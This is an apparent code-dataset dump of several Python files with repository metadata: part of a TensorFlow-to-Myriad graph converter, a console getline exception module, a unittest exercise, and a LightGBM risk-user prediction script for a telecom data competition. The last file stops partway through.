xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.scale,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
xyz[2],
node.inputs[1 - iidx].eval(),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif (node.type == 'Add' or node.type == 'Sub') and prev_node_label is not None \
and strip_tensor_id(node.inputs[0].name) == prev_node_label:
# We are probaby adding a constant bias, try
if debug:
print('Add (bias)')
inputs = node.inputs[0].get_shape()
bias_data = None
bias_data = node.inputs[1].eval() # This eval may fail
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported Bias Dimensions")
# Add scalar
if bias_data.ndim == 1 and bias_data.shape[0] == 1:
# Populate bias array with data
value = bias_data[0]
bias_data = np.empty([int(outputs[3])])
bias_data.fill(value)
if node.type == 'Add':
prev_node.addBias(np.array(bias_data).astype(np.float16))
else:
prev_node.addBias(np.array(-bias_data).astype(np.float16))
prev_node.changeName(node.name)
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "Maximum":
if debug:
print(node.type)
if prev_node_label == None:
iidx = 0
else:
iidx = 1 if node.inputs[1].name == prev_node_label + ":0" else 0
inputs = node.inputs[iidx]
input_shape = inputs.get_shape()
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(node.name,
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.max_with_const,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
xyz[2],
node.inputs[1 - iidx].eval(),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif (node.type == "Square" or node.type == "Rsqrt") and \
(get_input(strip_tensor_id(node.inputs[0].name), False) != 0):
if debug:
print(node.type)
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(input_shape) == 4):
node.outputs[0].set_shape(
[input_shape[0], input_shape[1], input_shape[2], outputs[3]])
elif(len(input_shape) == 2):
node.outputs[0].set_shape([input_shape[0], input_shape[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported " + node.type + " dimensions")
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
if node.type == "Square":
op_type = StageType.square
else:
op_type = StageType.rsqrt
prev_node = NetworkStage(node.name,
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
op_type,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
int(input_shape[1]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Sum":
if debug:
print(node.type)
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
output_shape = node.outputs[0].get_shape()
axis = node.inputs[1].eval()
if axis != len(output_shape) - 1:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported " + node.type + " axis")
axis_param = np.array([axis, 0], dtype=np.float16)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(node.name,
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.sum_reduce,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
1,
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments,
opParams=axis_param)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif (node.type == 'FusedBatchNorm' and prev_node_label is not None and
len(node.inputs) == 5):
if debug:
print('FusedBatchNorm')
# Fold the batchnorm into the weights
if prev_node.op == StageType.convolution or \
prev_node.op == StageType.fully_connected_layer or \
prev_node.op == StageType.depthwise_convolution:
if debug:
print('FusedBatchNorm absorbed into convolution')
eps = node.get_attr('epsilon')
scale_param = node.inputs[1].eval()
offset = node.inputs[2].eval()
mean = node.inputs[3].eval()
var = node.inputs[4].eval()
if len(mean) == 0 or len(var) == 0:
throw_error(
ErrorTable.StageDetailsNotSupported,
"FusedBatchNorm inputs mean and variance are not defined. The graph is not created for inference.")
variance = var + eps
scale = np.reciprocal(np.sqrt(variance)) * scale_param
bias = offset - (mean * scale)
scale = np.reshape(scale, [1, 1, 1, -1])
bias = np.reshape(bias, [1, 1, 1, -1])
if prev_node.op == StageType.depthwise_convolution:
scale = np.swapaxes(scale,2,3)
bias = np.swapaxes(bias,2,3)
prev_node.taps = prev_node.taps * scale
if prev_node.bias is not None:
if bias is not None:
prev_node.bias = prev_node.bias * scale + bias
else:
prev_node.bias = prev_node.bias * scale
else:
if bias is not None:
prev_node.addBias(np.array(bias).astype(np.float16))
node_dict[node.name] = node_dict[prev_node_label]
prev_node_label = node.name
prev_node.name = prev_node.unprocessed_name + '/' + node.name
prev_node.changeName(prev_node.name)
prev_node.alias.append(prev_node.unprocessed_name)
prev_node.alias.append(node.name)
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"FusedBatchNorm must be preceded by convolution or fully connected layer")
elif node.type == 'Slice' and not node.inputs[0].dtype.is_integer:
if debug:
print('Slice')
input_shape = node.inputs[0].get_shape()
slicingbegin = node.inputs[1].eval()
slicingsize = node.inputs[2].eval()
if (len(input_shape) != 4 or len(slicingbegin) != 4 or len(slicingsize) != 4 or
slicingbegin[0] != 0 or slicingbegin[1] != 0 or slicingbegin[2] != 0 or
input_shape[0] != slicingsize[0] or input_shape[1] != slicingsize[1] or input_shape[2] != slicingsize[2]):
throw_error(
ErrorTable.StageDetailsNotSupported,
"Slice type not supported")
top = get_input(strip_tensor_id(node.inputs[0].name))
curslicing = []
curslicing.append(
(top, int(
slicingbegin[3]), int(
slicingbegin[3] + slicingsize[3])))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]),
1,
1,
slicingsize[3],
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == 'ExtractImagePatches':
if debug:
print("ExtractImagePatches")
# Currently not supported, will be interpreted as reorg for yolo-v2
throw_error(ErrorTable.StageDetailsNotSupported, node.type)
'''
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
stride = node.get_attr("stride")
output_shape = [input_shape[0], tf.Dimension(int(input_shape[1]) / stride),
tf.Dimension(int(input_shape[2]) / stride),
tf.Dimension(int(input_shape[3]) * stride * stride)]
node.outputs[0].set_shape(output_shape)
top = get_input(strip_tensor_id(inputs.name))
op_node = NetworkStage(
node.name + '_op',
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.reorg,
0,
0,
0,
0,
int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]),
int(output_shape[1]),
int(output_shape[2]),
int(output_shape[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments,
opParams=np.array([stride], dtype=np.int32))
network.attach(op_node)
prev_node_label = node.name + '_op'
node_dict[prev_node_label] = prev_node
cnt += 1
prev_node = NetworkStage(
node.name,
[node.name + '_op'],
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
int(output_shape[1]),
int(output_shape[2]),
int(output_shape[3]),
int(output_shape[1]),
int(output_shape[2]),
int(output_shape[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = node.name
node_dict[prev_node_label] = prev_node
cnt += 1
'''
elif (node.type == 'StridedSlice') and not node.inputs[0].dtype.is_integer:
if debug:
print('StridedSlice')
input_shape = node.inputs[0].get_shape()
slicingbegin = node.inputs[1].eval()
slicingsize = node.inputs[2].eval() - slicingbegin
slicingstride = node.inputs[3].eval()
begin_mask = node.get_attr('begin_mask')
end_mask = node.get_attr('end_mask')
ellipsis_mask = node.get_attr('ellipsis_mask')
new_axis_mask = node.get_attr('new_axis_mask')
shrink_axis_mask = node.get_attr('shrink_axis_mask')
if begin_mask != 5 or end_mask != 5 or ellipsis_mask != 0 or new_axis_mask != 0 or shrink_axis_mask != 2:
throw_error(
ErrorTable.StageDetailsNotSupported,
"StridedSlice attributes not supported")
if (len(input_shape) != 3 or len(slicingbegin) != 3 or len(slicingsize) != 3 or len(slicingstride) != 3 or
slicingsize[1] != 1 or slicingstride[0] != 1 or slicingstride[1] != 1 or slicingstride[2] != 1):
throw_error(
ErrorTable.StageDetailsNotSupported,
"Slice type not supported")
top = get_input(strip_tensor_id(node.inputs[0].name))
curslicing = []
curslicing.append(
(top, int(slicingbegin[1]) * int(input_shape[2]), (int(slicingbegin[1])+1) * int(input_shape[2]))
)
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
int(input_shape[0]),
int(input_shape[1]),
int(input_shape[2]),
1,
1,
int(input_shape[2]),
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == 'Split' and node.inputs[0].dtype.is_integer:
if debug:
print('Split')
n = len(node.outputs)
dim = node.inputs[0].eval()
input_shape = node.inputs[1].get_shape()
size = int(input_shape[dim])
dim += 1
while dim < len(input_shape):
size *= int(input_shape[dim])
dim += 1
top = get_input(strip_tensor_id(node.inputs[1].name))
for i in range(n):
curslicing = []
curslicing.append((top[0] if top is not None else None, size//n * i, size//n * (i+1)))
prev_node = NetworkStage(strip_tensor_id(node.outputs[i].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
1,
int(input_shape[0]),
int(input_shape[1]),
1,
1,
size//n,
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[i].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == 'Pad':
if debug:
print('Pad')
padding_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(node.inputs[0].name),
node.inputs[1].eval())]
elif (node.type == 'TruncatedNormal' or node.type == 'Assign' or
node.type == 'RandomUniform' or node.type == 'Div' or node.type == 'RealDiv' or node.type == 'Mul' or
node.type == 'Floor' or node.type == 'Add' or node.type == 'Sub' or
node.type == 'Rsqrt' or node.type == 'RandomStandardNormal' or
node.type == 'L2Loss' or node.type == 'Pack' or node.type == 'Slice' or
node.type == 'Prod' or node.type == 'ExpandDims' or node.type == 'ConcatV2' or
node.type == 'StridedSlice' or node.type == 'Fill'or node.type == 'StringJoin' or node.type == 'SaveV2' or
node.type == 'RestoreV2' or node.type == 'ShardedFilename' or
node.type == 'MergeV2Checkpoints'):
pass
else:
throw_error(ErrorTable.StageDetailsNotSupported, node.type)
if len(node.outputs) > 0 and strip_tensor_id(node.outputs[0].name) == output_node_name:
if node.type == 'Concat' or node.type == 'ConcatV2':
nodes = network.search_several(get_input(node.name)[0])
NetworkStage.concat(nodes)
break
if len(res.shape) == 4:
network.outputTensor = (
res.shape[0],
res.shape[1],
res.shape[2],
res.shape[3])
else:
network.outputTensor = (res.shape[0], 1, 1, res.shape[1])
if file_gen:
try:
np.save(filename + "_expected.npy", res)
except BaseException:
throw_error(ErrorTable.NoOutputNode, extra=net.blob.keys())
return network
| 80,713 | 0 | 183 |
090b7c98b12efeb6c22312354186eb599698aef2 | 316 | py | Python | getline/excepts.py | timtadh/getline | c17a3405bde1f2edd2bdfbb9ad4c230d0419ac0b | [
"BSD-3-Clause"
] | 4 | 2015-03-25T04:53:43.000Z | 2016-07-17T18:06:42.000Z | getline/excepts.py | timtadh/getline | c17a3405bde1f2edd2bdfbb9ad4c230d0419ac0b | [
"BSD-3-Clause"
] | null | null | null | getline/excepts.py | timtadh/getline | c17a3405bde1f2edd2bdfbb9ad4c230d0419ac0b | [
"BSD-3-Clause"
] | null | null | null | '''
Getline - A library to get text from the console
Author: Tim Henderson
Contact: tim.tadh@hackthology.com
Copyright (c) 2010 All Rights Reserved.
Licensed under a BSD style license see the LICENSE file.
File: __linux_impl
Purpose: The linux implementation of getline
'''
| 24.307692 | 56 | 0.787975 | '''
Getline - A library to get text from the console
Author: Tim Henderson
Contact: tim.tadh@hackthology.com
Copyright (c) 2010 All Rights Reserved.
Licensed under a BSD style license see the LICENSE file.
File: __linux_impl
Purpose: The linux implementation of getline
'''
class GetlineException(Exception): pass
| 0 | 18 | 23 |
55d9072e4d504f55d90ff8e9c73484fcf9c7cdd6 | 528 | py | Python | 01-python-refresher/problems/05-first-negative-index.py | estimand/python-for-data-science | 90178784eb40936054d53f4ebbb67b2cf7fd4087 | [
"CC-BY-4.0"
] | null | null | null | 01-python-refresher/problems/05-first-negative-index.py | estimand/python-for-data-science | 90178784eb40936054d53f4ebbb67b2cf7fd4087 | [
"CC-BY-4.0"
] | null | null | null | 01-python-refresher/problems/05-first-negative-index.py | estimand/python-for-data-science | 90178784eb40936054d53f4ebbb67b2cf7fd4087 | [
"CC-BY-4.0"
] | 4 | 2019-03-05T17:53:30.000Z | 2019-06-26T11:48:57.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
def first_negative_index():
"""
Returns the index of the first negative element in a given list of numbers.
"""
return
if __name__ == "__main__":
unittest.main()
| 22.956522 | 79 | 0.668561 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
def first_negative_index():
"""
Returns the index of the first negative element in a given list of numbers.
"""
return
class TestFirstNegativeIndex(unittest.TestCase):
def test_first_negative_index(self):
self.assertIsNone(first_negative_index([]))
self.assertIsNone(first_negative_index([1, 3, 5, 7, 9]))
self.assertEqual(first_negative_index([1, 3, -5, 7, -9]), 2)
if __name__ == "__main__":
unittest.main()
| 201 | 27 | 49 |
69396c6f63e0123dbeff5f668a09d4d0ec0ad2c8 | 9,832 | py | Python | src/main.py | autowonderman/2018-JData-Unicom-RiskUser | 6ea5d3179aa8ea1a89e9b8fa7e74ce9c9cac4302 | [
"MIT"
] | 20 | 2018-05-23T08:39:16.000Z | 2021-02-20T04:14:06.000Z | src/main.py | wujx0213/2018-JData-Unicom-RiskUser | 6ea5d3179aa8ea1a89e9b8fa7e74ce9c9cac4302 | [
"MIT"
] | null | null | null | src/main.py | wujx0213/2018-JData-Unicom-RiskUser | 6ea5d3179aa8ea1a89e9b8fa7e74ce9c9cac4302 | [
"MIT"
] | 17 | 2018-05-23T07:28:22.000Z | 2019-03-20T09:18:28.000Z | # coding: utf-8
from __future__ import division
import numpy as np
import pandas as pd
from sklearn import metrics
import lightgbm as lgb
import time
from multiprocessing import cpu_count
import warnings
warnings.filterwarnings('ignore')
# Constants define
ROOT_PATH = '../'
ONLINE = 1
target = 'label'
train_len = 4999
threshold = 0.5
########################################### Helper function ###########################################
########################################### Read data ###########################################
train = pd.read_csv(ROOT_PATH + 'data/input/train/uid_train.txt', header=None, sep='\t')
train.columns = ['uid', 'label']
train_voice = pd.read_csv(ROOT_PATH + 'data/input/train/voice_train.txt', header=None, sep='\t')
train_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
train_sms = pd.read_csv(ROOT_PATH + 'data/input/train/sms_train.txt', header=None, sep='\t')
train_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
train_wa = pd.read_csv(ROOT_PATH + 'data/input/train/wa_train.txt', header=None, sep='\t')
train_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
test = pd.DataFrame({'uid': ['u' + str(i) for i in range(5000, 7000)]})
test_voice = pd.read_csv(ROOT_PATH + 'data/input/test_a/voice_test_a.txt', header=None, sep='\t')
test_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
test_sms = pd.read_csv(ROOT_PATH + 'data/input/test_a/sms_test_a.txt', header=None, sep='\t')
test_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
test_wa = pd.read_csv(ROOT_PATH + 'data/input/test_a/wa_test_a.txt', header=None, sep='\t')
test_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
df = pd.concat([train, test]).reset_index(drop=True)
df_voice = pd.concat([train_voice, test_voice]).reset_index(drop=True)
df_sms = pd.concat([train_sms, test_sms]).reset_index(drop=True)
df_wa = pd.concat([train_wa, test_wa]).reset_index(drop=True)
########################################### Feature engineer ###########################################
predictors = []
df, predictors_tmp = merge_feat_count(df, df_voice, ['uid'], 'count_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_sms, ['uid'], 'count_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_wa, ['uid'], 'count_gb_uid_in_wa'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'opp_len'], 'voice_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'call_type'], 'voice_call_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'in_out'], 'voice_in_out_'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'opp_len'], 'sms_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'in_out'], 'sms_in_out'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'wa_type'], 'wa_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'date'], 'wa_date'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_wa, ['uid'], 'wa_name', 'nunique_waName_gb_uid_in_wa'); predictors += predictors_tmp
col_list = ['visit_cnt', 'visit_dura', 'up_flow', 'down_flow']
for i in col_list:
df, predictors_tmp = merge_feat_min(df, df_wa, ['uid'], i, 'min_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_max(df, df_wa, ['uid'], i, 'max_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_mean(df, df_wa, ['uid'], i, 'mean_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
train_x = df.loc[:(train_len - 1), predictors]
train_y = df.loc[:(train_len - 1), target]
test_x = df.loc[train_len:, predictors]
########################################### LightGBM ###########################################
config_lgb = {
'rounds': 10000,
'folds': 5
}
params_lgb = {
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'num_leaves': 63,
'learning_rate': 0.06,
'feature_fraction': 0.8,
'bagging_fraction': 0.8,
'bagging_freq': 1,
# 'min_sum_hessian_in_leaf': 10,
'verbosity': 5,
'num_threads': cpu_count() - 1,
'seed': 7,
}
# lgb_cv(train_x, train_y, params_lgb, config_lgb['rounds'], config_lgb['folds'])
model_lgb, pred_lgb = lgb_train_predict(train_x, train_y, test_x, params_lgb, 90)
result = store_result(test.uid, pred_lgb, threshold, '20180523-lgb-%d-%d(r%d)' % (7742, 9098, 90))
result = store_result(test.uid, pred_lgb, threshold, 'submission')
imp = pd.DataFrame({'feature':train_x.columns.values, 'importance':list(model_lgb.feature_importance())})
imp = imp.sort_values(by = 'importance', ascending = False)
imp.to_csv(ROOT_PATH + 'data/output/feat_imp/imp-20180523-%d-%d(r%d).csv' % (7700, 9102, 90), index=False)
| 49.908629 | 139 | 0.682465 | # coding: utf-8
from __future__ import division
import numpy as np
import pandas as pd
from sklearn import metrics
import lightgbm as lgb
import time
from multiprocessing import cpu_count
import warnings
warnings.filterwarnings('ignore')
# Constants define
ROOT_PATH = '../'
ONLINE = 1
target = 'label'
train_len = 4999
threshold = 0.5
########################################### Helper function ###########################################
def log(info):
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + ' ' + str(info))
def merge_feat_count(df, df_feat, columns_groupby, new_column_name, type='int'):
df_count = pd.DataFrame(df_feat.groupby(columns_groupby).size()).fillna(0).astype(type).reset_index()
df_count.columns = columns_groupby + [new_column_name]
df = df.merge(df_count, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_onehot_count(df, df_feat, columns_groupby, prefix, type='int'):
df_count = df_feat.groupby(columns_groupby).size().unstack().fillna(0).astype(type).reset_index()
df_count.columns = [i if i == columns_groupby[0] else prefix + '_' + str(i) for i in df_count.columns]
df = df.merge(df_count, on=columns_groupby[0], how='left')
return df, list(np.delete(df_count.columns.values, 0))
def merge_feat_nunique(df, df_feat, columns_groupby, column, new_column_name, type='int'):
df_nunique = pd.DataFrame(df_feat.groupby(columns_groupby)[column].nunique()).fillna(0).astype(type).reset_index()
df_nunique.columns = columns_groupby + [new_column_name]
df = df.merge(df_nunique, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_min(df, df_feat, columns_groupby, column, new_column_name, type='float'):
df_min = pd.DataFrame(df_feat.groupby(columns_groupby)[column].min()).fillna(0).astype(type).reset_index()
df_min.columns = columns_groupby + [new_column_name]
df = df.merge(df_min, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_max(df, df_feat, columns_groupby, column, new_column_name, type='float'):
df_max = pd.DataFrame(df_feat.groupby(columns_groupby)[column].max()).fillna(0).astype(type).reset_index()
df_max.columns = columns_groupby + [new_column_name]
df = df.merge(df_max, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_mean(df, df_feat, columns_groupby, column, new_column_name, type='float'):
df_mean = pd.DataFrame(df_feat.groupby(columns_groupby)[column].mean()).fillna(0).astype(type).reset_index()
df_mean.columns = columns_groupby + [new_column_name]
df = df.merge(df_mean, on=columns_groupby, how='left')
return df, [new_column_name]
def eval_auc_f1(preds, dtrain):
df = pd.DataFrame({'y_true': dtrain.get_label(), 'y_score': preds})
df['y_pred'] = df['y_score'].apply(lambda x: 1 if x >= threshold else 0)
auc = metrics.roc_auc_score(df.y_true, df.y_score)
f1 = metrics.f1_score(df.y_true, df.y_pred)
return 'feval', (auc * 0.6 + f1 * 0.4), True
def lgb_cv(train_x, train_y, params, rounds, folds):
start = time.clock()
log(str(train_x.columns))
dtrain = lgb.Dataset(train_x, label=train_y)
log('run cv: ' + 'round: ' + str(rounds))
res = lgb.cv(params, dtrain, rounds, nfold=folds,
metrics=['eval_auc_f1', 'auc'], feval=eval_auc_f1,
early_stopping_rounds=200, verbose_eval=5)
elapsed = (time.clock() - start)
log('Time used:' + str(elapsed) + 's')
return len(res['feval-mean']), res['feval-mean'][len(res['feval-mean']) - 1], res['auc-mean'][len(res['auc-mean']) - 1]
def lgb_train_predict(train_x, train_y, test_x, params, rounds):
start = time.clock()
log(str(train_x.columns))
dtrain = lgb.Dataset(train_x, label=train_y)
valid_sets = [dtrain]
model = lgb.train(params, dtrain, rounds, valid_sets, feval=eval_auc_f1, verbose_eval=5)
pred = model.predict(test_x)
elapsed = (time.clock() - start)
log('Time used:' + str(elapsed) + 's')
return model, pred
def store_result(test_index, pred, threshold, name):
result = pd.DataFrame({'uid': test_index, 'prob': pred})
result = result.sort_values('prob', ascending=False)
result['label'] = 0
result.loc[result.prob > threshold, 'label'] = 1
result.to_csv('../data/output/sub/' + name + '.csv', index=0, header=0, columns=['uid', 'label'])
return result
########################################### Read data ###########################################
train = pd.read_csv(ROOT_PATH + 'data/input/train/uid_train.txt', header=None, sep='\t')
train.columns = ['uid', 'label']
train_voice = pd.read_csv(ROOT_PATH + 'data/input/train/voice_train.txt', header=None, sep='\t')
train_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
train_sms = pd.read_csv(ROOT_PATH + 'data/input/train/sms_train.txt', header=None, sep='\t')
train_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
train_wa = pd.read_csv(ROOT_PATH + 'data/input/train/wa_train.txt', header=None, sep='\t')
train_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
test = pd.DataFrame({'uid': ['u' + str(i) for i in range(5000, 7000)]})
test_voice = pd.read_csv(ROOT_PATH + 'data/input/test_a/voice_test_a.txt', header=None, sep='\t')
test_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
test_sms = pd.read_csv(ROOT_PATH + 'data/input/test_a/sms_test_a.txt', header=None, sep='\t')
test_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
test_wa = pd.read_csv(ROOT_PATH + 'data/input/test_a/wa_test_a.txt', header=None, sep='\t')
test_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
df = pd.concat([train, test]).reset_index(drop=True)
df_voice = pd.concat([train_voice, test_voice]).reset_index(drop=True)
df_sms = pd.concat([train_sms, test_sms]).reset_index(drop=True)
df_wa = pd.concat([train_wa, test_wa]).reset_index(drop=True)
########################################### Feature engineer ###########################################
predictors = []
df, predictors_tmp = merge_feat_count(df, df_voice, ['uid'], 'count_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_sms, ['uid'], 'count_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_wa, ['uid'], 'count_gb_uid_in_wa'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'opp_len'], 'voice_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'call_type'], 'voice_call_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'in_out'], 'voice_in_out_'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'opp_len'], 'sms_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'in_out'], 'sms_in_out'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'wa_type'], 'wa_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'date'], 'wa_date'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_sms'); predictors += predictors_tmp
